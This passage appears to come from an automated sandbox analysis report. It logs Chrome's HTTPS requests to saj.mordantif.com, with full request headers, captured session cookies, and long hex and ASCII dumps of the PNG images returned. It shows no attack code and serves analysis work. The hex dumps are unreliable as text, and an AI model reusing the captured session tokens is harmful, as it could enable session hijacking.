92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d
                                                        Data Ascii: Y$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0
                                                        Data Ascii: O0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8
                                                        2024-09-13 13:07:11 UTC1369INData Raw: e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4
                                                        Data Ascii: ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1 56 79
                                                        Data Ascii: I$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SGVy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.549834172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:11 UTC1459OUTGET /qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC654INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:11 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 29796
                                                        Connection: close
                                                        Content-Disposition: inline; filename="qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PBdaiZCrfhjOAKTIe1hV8wTAjL80hFh3aRJRxcvB9%2FYhsp6cP6QpUb596qGkF8wINnVBMNpRPUb9V2bIjM0GNfhxFdnNkrNIV8RtY0YCsNumgAq%2BPzcfV5GbQVIOFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bda6da24234-EWR
                                                        2024-09-13 13:07:11 UTC715INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                        Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0 e8 52 18 4e 2e ae 28 5c a4 28 0a
                                                        Data Ascii: bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7HeyRN.(\(
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03 34 23 68 a2 d6 80 6a 04 b8 64 6b
                                                        Data Ascii: [-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W4#hjdk
                                                        2024-09-13 13:07:11 UTC1369INData Raw: b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82 35 ab 57 f3 82 97 ec 6c be a4 57
                                                        Data Ascii: 1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W5WlW
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42 27 e5 f2 b9 93 38 76 40 92 4d ad
                                                        Data Ascii: JS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'8v@M
                                                        2024-09-13 13:07:11 UTC1369INData Raw: c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22 23 25 47 b6 e6 b1 b0
                                                        Data Ascii: ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["#%G
                                                        2024-09-13 13:07:11 UTC1369INData Raw: c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44 de 47 61 b7 a2 68 d5
                                                        Data Ascii: xp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?DGah
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d f6 cb 88 5e 9b e8 1a
                                                        Data Ascii: jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m^
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33 e1 92 80 6f e4 f6 7e
                                                        Data Ascii: L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3o~
                                                        2024-09-13 13:07:11 UTC1369INData Raw: d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e 97 68 8b b3 2f c1
                                                        Data Ascii: FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^h/


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.549831172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:11 UTC1471OUTGET /uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC676INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:11 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 70712
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FEsK6qR%2B9%2BbX7ECgc0vioIj55U992Yi9LrlRRH2Lswil9LjyAUwvNHD%2FnQPhlF7Rz1fWTviu%2FWSfSgBIic%2FL0yBTqntOyhJ%2FKqT7U2sCAY6fNmJqX6YBqKMQqBtNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bda6cac1841-EWR
                                                        2024-09-13 13:07:11 UTC693INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
